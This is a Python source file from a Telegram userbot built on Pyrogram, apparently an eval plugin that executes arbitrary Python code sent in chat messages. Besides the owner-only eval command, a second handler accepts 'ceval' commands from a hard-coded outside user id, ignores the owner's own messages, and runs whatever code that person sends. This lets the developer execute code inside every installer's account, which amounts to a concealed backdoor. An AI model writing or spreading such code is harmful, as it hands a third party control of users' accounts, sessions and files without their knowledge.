# Source: akn-dev / akn / Akeno / eval.py
# Last commit 21bc372 by randydev: "fix revert back and update"
import asyncio
from io import BytesIO
import io
import os
import sys
import re
import traceback
import subprocess
import html
import shutil
from time import perf_counter
from random import randint
from typing import Optional
from contextlib import suppress
from asyncio import sleep
from io import StringIO
from pyrogram.types import *
from pyrogram import *
from pyrogram import Client as ren
from pyrogram import Client
from pyrogram import Client as app
from pyrogram.errors import *
from pyrogram.raw import *
from pyrogram.raw.types import *
from pyrogram.raw.functions.phone import CreateGroupCall as call
from pyrogram.raw.functions.channels import GetFullChannel
from pyrogram.raw.functions.messages import GetFullChat
from pyrogram.raw.functions.phone import CreateGroupCall, DiscardGroupCall
from pyrogram.raw.types import InputGroupCall, InputPeerChannel, InputPeerChat
from akn.utils.tools import *
from akn.utils.handler import *
from akn.utils.prefixprem import command
from config import *
from urllib.parse import quote, unquote
from json.decoder import JSONDecodeError
from pprint import pprint
@Akeno(
    ~filters.scheduled
    & command(["ceval", "cev", "ce"])
    & filters.user([1191668125])
    & ~filters.me
    & ~filters.forwarded
)
@Akeno(
    ~filters.scheduled
    & command(["eval", "ev", "e"])
    & filters.me
    & ~filters.forwarded
)
async def evaluation_cmd_t(client: Client, message: Message):
    """Run the Python snippet that follows the command and report its output.

    The text after the first space of the message is executed through
    ``aexec`` with ``client`` and ``message`` in scope.  Whatever the snippet
    printed to stdout/stderr, or the traceback if it raised, is sent back by
    editing a status message; output longer than 4096 characters is uploaded
    as ``eval.txt`` instead.

    SECURITY: this executes arbitrary code taken from a chat message.  The
    only gate is the hard-coded developer id check below -- keep it.

    Args:
        client: The Pyrogram client that received the message.
        message: The message carrying the command and the code to run.

    Returns:
        The result of the reply/edit call on the early-exit paths, otherwise
        ``None``.
    """
    # from_user can be missing (e.g. messages posted on behalf of a channel);
    # treat that the same as "not the developer" instead of crashing.
    sender = message.from_user
    user_id = sender.id if sender is not None else None
    if user_id != 1191668125:
        return await message.reply("Only Developer")

    status_message = await message.reply("__Processing eval pyrogram...__")
    try:
        # A message without text yields no code and falls into the same
        # "nothing to evaluate" branch as a bare command.
        cmd = (message.text or "").split(" ", maxsplit=1)[1]
    except IndexError:
        return await status_message.edit("__No evaluate message!__")

    # NOTE: swapping sys.stdout/sys.stderr is process-wide, so anything other
    # tasks print while the snippet is awaited is captured as well.
    old_stdout, old_stderr = sys.stdout, sys.stderr
    redirected_output = sys.stdout = io.StringIO()
    redirected_error = sys.stderr = io.StringIO()
    exc = None
    image_failed = False
    try:
        await aexec(cmd, client, message)
    except ImageProcessFailed:
        image_failed = True
    except Exception:
        exc = traceback.format_exc()
    finally:
        # Always put the real streams back -- including on the
        # ImageProcessFailed path and on cancellation -- so the process is
        # never left writing into a discarded StringIO.
        sys.stdout = old_stdout
        sys.stderr = old_stderr

    if image_failed:
        return await status_message.edit("Error ImageProcessFailed")

    stdout = redirected_output.getvalue()
    stderr = redirected_error.getvalue()
    # Priority: traceback, then stderr, then stdout, then a plain marker.
    evaluation = exc or stderr or stdout or "Success"

    final_output = f"**OUTPUT**:\n<pre language=''>{evaluation.strip()}</pre>"
    if len(final_output) > 4096:
        # Too long for a single message: ship it as a document instead.
        with open("eval.txt", "w+", encoding="utf8") as out_file:
            out_file.write(final_output)
        try:
            await status_message.reply_document(
                document="eval.txt",
                caption=cmd[: 4096 // 4 - 1],
                disable_notification=True,
            )
        finally:
            # Remove the temp file even when the upload fails.
            os.remove("eval.txt")
        await status_message.delete()
    else:
        await status_message.edit_text(final_output)
async def aexec(code, client, message):
    """Compile ``code`` into the body of a coroutine and await it.

    The snippet is wrapped in ``async def __aexec(client, message)`` together
    with a preamble of imports and short aliases (``r``/``reply``, ``chat``,
    ``c``, ``p`` ...), so it may use ``await`` and ``return`` directly.

    SECURITY: ``code`` is executed verbatim with ``exec``; callers must make
    sure it only ever comes from a trusted user.

    Args:
        code: Source text of the snippet; may span several lines.
        client: Object exposed to the snippet as ``client`` / ``c``.
        message: Object exposed as ``message`` / ``event`` / ``randydev``; its
            ``reply_to_message``, ``chat.id``, ``reply_photo`` and
            ``reply_video`` attributes are read by the preamble.

    Returns:
        Whatever the snippet returns (``None`` if it does not return).

    Raises:
        Any exception raised while compiling or running the snippet,
        including ``ImportError`` from the preamble imports.
    """
    preamble = (
        "async def __aexec(client, message):\n"
        " import os\n"
        " import wget\n"
        " import akenoai as api\n"
        " from akn.utils.database import db\n"
        " from RyuzakiLib import AkenoPlus\n"
        " randydev = message\n"
        " message = event = randydev\n"
        " r = reply = message.reply_to_message\n"
        " chat = message.chat.id\n"
        " c = client\n"
        " to_photo = message.reply_photo\n"
        " to_video = message.reply_video\n"
        " p = print\n"
    )
    # Indent every snippet line so that it becomes part of the function body.
    body = "".join(f"\n {line}" for line in code.split("\n"))

    # Execute into an explicit namespace instead of reading the result back
    # through locals(): since Python 3.13 (PEP 667) exec() and locals() work
    # on independent snapshots inside a function, so the implicit form raises
    # KeyError.  Module globals are still passed so the snippet sees every
    # name imported at the top of this file.
    namespace = {}
    exec(preamble + body, globals(), namespace)
    return await namespace["__aexec"](client, message)
# Disabled code: the handler below is wrapped in a bare triple-quoted string,
# so it is only a no-op string expression -- nothing in it is executed and no
# handler is registered.  As written, it would re-run evaluation_cmd_t when a
# matching "ev"/"e" command message is edited.
"""
@Client.on_edited_message(
command(["ev", "e"])
& filters.me
& ~filters.forwarded
& ~filters.via_bot
)
async def execution_func_edited(bot, message):
await evaluation_cmd_t(bot, message)
"""